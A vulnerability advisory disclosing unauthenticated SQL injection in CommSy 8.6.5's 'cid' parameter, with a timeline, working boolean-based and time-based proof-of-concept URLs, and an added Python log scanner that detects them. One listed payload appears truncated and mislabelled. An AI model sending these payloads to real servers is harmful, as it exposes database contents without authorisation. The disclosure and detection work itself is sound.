CommSy 8.6.5 SQL Injection

CommSy version 8.6.5 suffers from a remote SQL injection vulnerability.

MD5 | 0aa181b0b3ef137ebde67a7a7ea633b0

CommSy 8.6.5 - SQL injection

Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG


2019-04-15 Vulnerability discovered
2019-04-15 Asked for security contact and PGP key
2019-04-16 Sent details to the vendor
2019-05-07 Flaw was approved but will not be fixed in branch 8.6
2019-05-15 Public disclosure

Affected Products:
CommSy <= 8.6.5

Vendor Homepage:

CommSy is a web-based community system, originally developed at the
University of Hamburg, Germany, to support learning/working communities.
We have discovered an unauthenticated SQL injection vulnerability in
CommSy <= 8.6.5 that makes it possible to read all database content. The
vulnerability exists in the HTTP GET parameter "cid" of commsy.php.

Proof of Concept:
boolean-based blind:
commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823 ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login

commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT (ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login

time-based blind:
commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
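Added detection example, not from the advisory or from the CommSy project: a small Python scanner that parses constructed Apache-style access-log lines mirroring the PoC requests above and flags any commsy.php request whose "cid" value is not a plain integer or carries SQL keywords. The log lines, timestamps and client addresses are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format). The second and
# third requests reproduce the advisory's time-based and boolean-based PoC URLs
# in URL-encoded form; the last one is a malformed but non-SQL value.
SAMPLE_LOG = """\
203.0.113.7 - - [15/May/2019:10:01:02 +0000] "GET /commsy.php?cid=101&mod=context&fct=login HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [15/May/2019:10:01:05 +0000] "GET /commsy.php?cid=101%22%20AND%20SLEEP(5)--%20MjJM&mod=context&fct=login HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [15/May/2019:10:01:09 +0000] "GET /commsy.php?cid=101%22%20AND%203823%3D(SELECT%20(CASE%20WHEN%20(3823%3D3823)%20THEN%203823%20ELSE%20(SELECT%207548%20UNION%20SELECT%204498)%20END))--%20dGRD&mod=context&fct=login HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.2 - - [15/May/2019:10:02:00 +0000] "GET /commsy.php?cid=abc&mod=context HTTP/1.1" 200 412 "-" "curl/7.64"
"""

# Minimal combined-log parser: client IP, timestamp, method, request URI, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)
# Indicators of SQL syntax in a value that should only ever be an integer.
SQLI_HINT = re.compile(r"(?i)\b(sleep|select|union|case|and|or)\b|['\"]|--")


def check_cid(uri):
    """Return findings for the cid parameter of a commsy.php request URI.

    parse_qs URL-decodes the value, so the regex runs on the decoded text.
    An empty list means the request looks benign or is not for commsy.php.
    """
    parts = urlsplit(uri)
    if not parts.path.endswith("commsy.php"):
        return []
    findings = []
    for value in parse_qs(parts.query, keep_blank_values=True).get("cid", []):
        if value.isdigit():
            continue  # well-formed context id; nothing to flag
        findings.append("non-numeric cid")
        if SQLI_HINT.search(value):
            findings.append("sql keywords in cid")
    return findings


def scan_log(text):
    """Return (ip, uri, findings) for every logged request with a suspect cid."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        findings = check_cid(m.group("uri"))
        if findings:
            hits.append((m.group("ip"), m.group("uri"), findings))
    return hits
```

Running scan_log(SAMPLE_LOG) reports the two PoC requests with both findings and the "abc" request as non-numeric only; the clean request is not reported.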

According to the vendor, the 8.6 version branch is no longer
supported and the vulnerability will not be fixed there. Customers should
update to the newest version, 9.2.
